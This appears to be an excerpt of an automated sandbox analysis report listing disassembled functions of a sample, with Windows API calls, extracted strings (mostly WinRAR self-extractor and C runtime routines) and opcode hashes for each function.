                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
                                                            • String ID: %s %s
                                                            • API String ID: 385609497-2939940506
                                                            • Opcode ID: 3aa6bd0d4000d6267547bd12b9a097234b91f55dc766270ac3614867e0673384
                                                            • Instruction ID: 797bcf52fbcce1aeb63343e9a27054cb828ff10de6b6bb3ba920b046481d90c9
                                                            • Opcode Fuzzy Hash: 3aa6bd0d4000d6267547bd12b9a097234b91f55dc766270ac3614867e0673384
                                                            • Instruction Fuzzy Hash: 2621DEB294115CABDB11DFA0EC44EEF3BACFF15304F440026FA09D2111E724DA89CB61
                                                            Function 00060D20 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,0004C41F,0004C421,00000000,00000000,4BF7CAE1,00000001,00000000,00000000,0004C30C,?,?,?,0004C41F,ROOT\CIMV2), ref: 00060DA9
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,0004C41F,?,00000000,00000000,?,?,?,?,?,0004C41F), ref: 00060E24
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00060E2F
                                                            • _com_issue_error.COMSUPP ref: 00060E58
                                                            • _com_issue_error.COMSUPP ref: 00060E62
                                                            • GetLastError.KERNEL32(80070057,4BF7CAE1,00000001,00000000,00000000,0004C30C,?,?,?,0004C41F,ROOT\CIMV2), ref: 00060E67
                                                            • _com_issue_error.COMSUPP ref: 00060E7A
                                                            • GetLastError.KERNEL32(00000000,?,0004C41F,ROOT\CIMV2), ref: 00060E90
                                                            • _com_issue_error.COMSUPP ref: 00060EA3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 1353541977-0
                                                            • Opcode ID: c3a37dde6ac50e42981c41e528b587d747d89f579b8f4ae00853b087de20e381
                                                            • Instruction ID: e0745ea354dc7ad283407e70a1e1760e68ea4eaa014175c92b8f15018b89a8d5
                                                            • Opcode Fuzzy Hash: c3a37dde6ac50e42981c41e528b587d747d89f579b8f4ae00853b087de20e381
                                                            • Instruction Fuzzy Hash: 9C410671A40214EBD7109FA8DC45BAFBBEAEB48750F108629F509E7241D73AA840CBA5
                                                            Function 0004C3D7 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                            • API String ID: 3519838083-3505469590
                                                            • Opcode ID: 436e9b4874017762913ee9e49dca0edf6ccff1e10025ee2ad6d3cfaeee33d8fe
                                                            • Instruction ID: d7d2a6ecc225a0837e41cad427764f0976b8847c17ce585e0963f8149681401a
                                                            • Opcode Fuzzy Hash: 436e9b4874017762913ee9e49dca0edf6ccff1e10025ee2ad6d3cfaeee33d8fe
                                                            • Instruction Fuzzy Hash: DF716C71A01619AFEB54DFA4CC94DBEB7B9FF88310B104169E506E72A1CB34AD42CB64
                                                            Function 0004A5C7 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0004A5CC
                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0004A5EF
                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0004A60E
                                                              • Part of subcall function 0004D687: _wcslen.LIBCMT ref: 0004D68F
                                                              • Part of subcall function 000532E6: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000132E6,0004D503,00000000,.exe,?,?,00000800,?,?,?,00059E2C), ref: 000532FC
                                                            • _swprintf.LIBCMT ref: 0004A6AA
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                            • MoveFileW.KERNEL32(?,?), ref: 0004A719
                                                            • MoveFileW.KERNEL32(?,?), ref: 0004A759
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: rtmp%d
                                                            • API String ID: 3726343395-3303766350
                                                            • Opcode ID: 3875bffdd0ee83e845500872f71843a8d6f0870231269a411c7bc8719271fb15
                                                            • Instruction ID: 6167137ff07e165c0d89b6f05e248bf9d89a946bdb835a7e8799f1ec70e29a53
                                                            • Opcode Fuzzy Hash: 3875bffdd0ee83e845500872f71843a8d6f0870231269a411c7bc8719271fb15
                                                            • Instruction Fuzzy Hash: 214164B1A4025966DF30EBA0CC49EEF73BCAF56381F0504B9B545E3042DB389A85DF69
                                                            Function 00052508 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 0005251E
                                                              • Part of subcall function 0004C5F9: GetVersionExW.KERNEL32(?), ref: 0004C61E
                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00052541
                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 00052553
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00052564
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00052574
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00052584
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 000525BF
                                                            • __aullrem.LIBCMT ref: 00052669
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                            • String ID:
                                                            • API String ID: 1247370737-0
                                                            • Opcode ID: af0e0215745beb56467cc203c2fc8cd5e1a706db61a71b79b9c4a15664cbcb2f
                                                            • Instruction ID: 4495903bf9739af70845e89bf1b8fdf75cf99bbde811799dc0bee262b36f71dc
                                                            • Opcode Fuzzy Hash: af0e0215745beb56467cc203c2fc8cd5e1a706db61a71b79b9c4a15664cbcb2f
                                                            • Instruction Fuzzy Hash: 594138B15083059FD750DF65C88496BBBF9FF88315F40892EF99AD2210E738E589CB62
                                                            Function 0005ACEE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                            • API String ID: 176396367-3568243669
                                                            • Opcode ID: 63eb1b2dca3e0129fa8429264c797ed65c6c397f06496f80f8cef307bdbd88a7
                                                            • Instruction ID: 006cbda645e1a3f6585073309fc31a4427d92853603d5d2cb4b278aad59d5d37
                                                            • Opcode Fuzzy Hash: 63eb1b2dca3e0129fa8429264c797ed65c6c397f06496f80f8cef307bdbd88a7
                                                            • Instruction Fuzzy Hash: A351482674032395DB746A145C127B773F0DFA2793F58462AFDC28B6C0FBA58D488272
                                                            Function 0007069D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00070E12,00000000,00000000,00000000,00000000,00000000,000663FD), ref: 000706DF
                                                            • __fassign.LIBCMT ref: 0007075A
                                                            • __fassign.LIBCMT ref: 00070775
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0007079B
                                                            • WriteFile.KERNEL32(?,00000000,00000000,00070E12,00000000,?,?,?,?,?,?,?,?,?,00070E12,00000000), ref: 000707BA
                                                            • WriteFile.KERNEL32(?,00000000,00000001,00070E12,00000000,?,?,?,?,?,?,?,?,?,00070E12,00000000), ref: 000707F3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 6fd4768f91eb89c76a4ea8ce19512bfee5d46d7420c051d05d51a58901eb84f6
                                                            • Instruction ID: 76410cb5fdefc24639d288c503d0809dbb897fd22e27a53b5afc95ecb495a12a
                                                            • Opcode Fuzzy Hash: 6fd4768f91eb89c76a4ea8ce19512bfee5d46d7420c051d05d51a58901eb84f6
                                                            • Instruction Fuzzy Hash: 9851A270E00249DFDB10CFA8D885BEEBBF8EF49300F14825AE959E7251D7349941CBA5
                                                            Function 000638E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 00063917
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0006391F
                                                            • _ValidateLocalCookies.LIBCMT ref: 000639A8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 000639D3
                                                            • _ValidateLocalCookies.LIBCMT ref: 00063A28
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: 93e9a3d58a315d8cd701280a19ca927d8c0eeba846f649f9ab446cabd5ea2228
                                                            • Instruction ID: 184ab2c04fce04077b5091a48cc586e64fb679d08c99b1be3cc643341e4deb97
                                                            • Opcode Fuzzy Hash: 93e9a3d58a315d8cd701280a19ca927d8c0eeba846f649f9ab446cabd5ea2228
                                                            • Instruction Fuzzy Hash: AF41A134E00208AFCF50DF68D881AEEBBF6AF45324F148155E9199B392C7759A15CFE1
                                                            Function 0005AEC5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 0005AEDE
                                                            • GetWindowRect.USER32(?,?), ref: 0005AF34
                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 0005AFD1
                                                            • SetWindowTextW.USER32(?,00000000), ref: 0005AFD9
                                                            • ShowWindow.USER32(00000000,00000005), ref: 0005AFEF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$RectText
                                                            • String ID: RarHtmlClassName
                                                            • API String ID: 3937224194-1658105358
                                                            • Opcode ID: e67e88d2ee3edae468c83dd906fde2ea1708ac681c1f9e5baa8b3845ce6f37e0
                                                            • Instruction ID: 1fce14ef4757b562533ad0a4df9918faf66315744810b03013af17fd9229759d
                                                            • Opcode Fuzzy Hash: e67e88d2ee3edae468c83dd906fde2ea1708ac681c1f9e5baa8b3845ce6f37e0
                                                            • Instruction Fuzzy Hash: 3141D072244604BFEB215FA0DC48B6B7BE9FF4A702F044669FD4999062DB34D848CB62
                                                            Function 0005A945 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                            • API String ID: 176396367-3743748572
                                                            • Opcode ID: 3ee9973e1afc7125f71758cd528e0f738cd08563a8400ab12a0cac946dff369e
                                                            • Instruction ID: b2659a50fd6424c2df4ae04a450e4e73d8cd3fe33542f9adc99ad0692313e909
                                                            • Opcode Fuzzy Hash: 3ee9973e1afc7125f71758cd528e0f738cd08563a8400ab12a0cac946dff369e
                                                            • Instruction Fuzzy Hash: 8C317226B443019AD674AF549C42BBB73E4EB91722F10461FFD85972C1FB54AC58C3A3
                                                            Function 0006D8B4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0006D878: _free.LIBCMT ref: 0006D8A1
                                                            • _free.LIBCMT ref: 0006D902
                                                              • Part of subcall function 0006A4BA: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?), ref: 0006A4D0
                                                              • Part of subcall function 0006A4BA: GetLastError.KERNEL32(?,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?,?), ref: 0006A4E2
                                                            • _free.LIBCMT ref: 0006D90D
                                                            • _free.LIBCMT ref: 0006D918
                                                            • _free.LIBCMT ref: 0006D96C
                                                            • _free.LIBCMT ref: 0006D977
                                                            • _free.LIBCMT ref: 0006D982
                                                            • _free.LIBCMT ref: 0006D98D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                            • Instruction ID: 5b42b4c382fe2f3bd46b2267218a73adb9bc2936542d7a38b5094bbe0473a9f7
                                                            • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                            • Instruction Fuzzy Hash: 041112B1E40B04AAE520B7B0CC0BFCB77AFAF45701F504C26B69A67053DE79F5058A51
                                                            Function 0005F5C8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0005F643,0005F5A6,0005F847), ref: 0005F5DF
                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0005F5F5
                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0005F60A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 667068680-1718035505
                                                            • Opcode ID: b16aedaa0dc6ba972cafac423753559fba519e5e908f1c65b1a14117000d9b41
                                                            • Instruction ID: 7259a5f5dea53d955f9ea406e37e1858c41cb1e5c2d62a6ca89ae1b836671b08
                                                            • Opcode Fuzzy Hash: b16aedaa0dc6ba972cafac423753559fba519e5e908f1c65b1a14117000d9b41
                                                            • Instruction Fuzzy Hash: 41F04631B41A239B6B705FB06C8017B62DD8B023033100938EF0AE31A0E62CCD8E8AD0
                                                            Function 00052769 Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 000527C1
                                                              • Part of subcall function 0004C5F9: GetVersionExW.KERNEL32(?), ref: 0004C61E
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000527E5
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 000527FF
                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00052812
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00052822
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00052832
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: 30f38469fbebddc0869c30a23240de2204fcaa256b558b1fdd47cbeb84148659
                                                            • Instruction ID: 63326417cb90902a9e62ae780f14451ed78d6d7e8c3dc1c8a1b80703fce1bd29
                                                            • Opcode Fuzzy Hash: 30f38469fbebddc0869c30a23240de2204fcaa256b558b1fdd47cbeb84148659
                                                            • Instruction Fuzzy Hash: 89310975508315AFC704DFA8D88499BB7E8FF98714F004A1EF999D3210E734E589CBA6
                                                            Function 00063ADA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00063AD1,0006388C,00060A44), ref: 00063AE8
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00063AF6
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00063B0F
                                                            • SetLastError.KERNEL32(00000000,00063AD1,0006388C,00060A44), ref: 00063B61
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: 4a308899be492def63ccb2c7461ecbedad710df11c1c22c6b78676d9653256b6
                                                            • Instruction ID: c7361aad110a8efd8490afd59e05c55be9447ee4315a187c72466bc0f8b0c1db
                                                            • Opcode Fuzzy Hash: 4a308899be492def63ccb2c7461ecbedad710df11c1c22c6b78676d9653256b6
                                                            • Instruction Fuzzy Hash: 0101F736B0D3116EF7E42B757C86AAA27C6FF01770B201229F610A65F2EF155C0456C4
                                                            Function 0006A365 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,000830C4,000657D2,000830C4,?,?,0006524D,?,?,000830C4), ref: 0006A369
                                                            • _free.LIBCMT ref: 0006A39C
                                                            • _free.LIBCMT ref: 0006A3C4
                                                            • SetLastError.KERNEL32(00000000,?,000830C4), ref: 0006A3D1
                                                            • SetLastError.KERNEL32(00000000,?,000830C4), ref: 0006A3DD
                                                            • _abort.LIBCMT ref: 0006A3E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
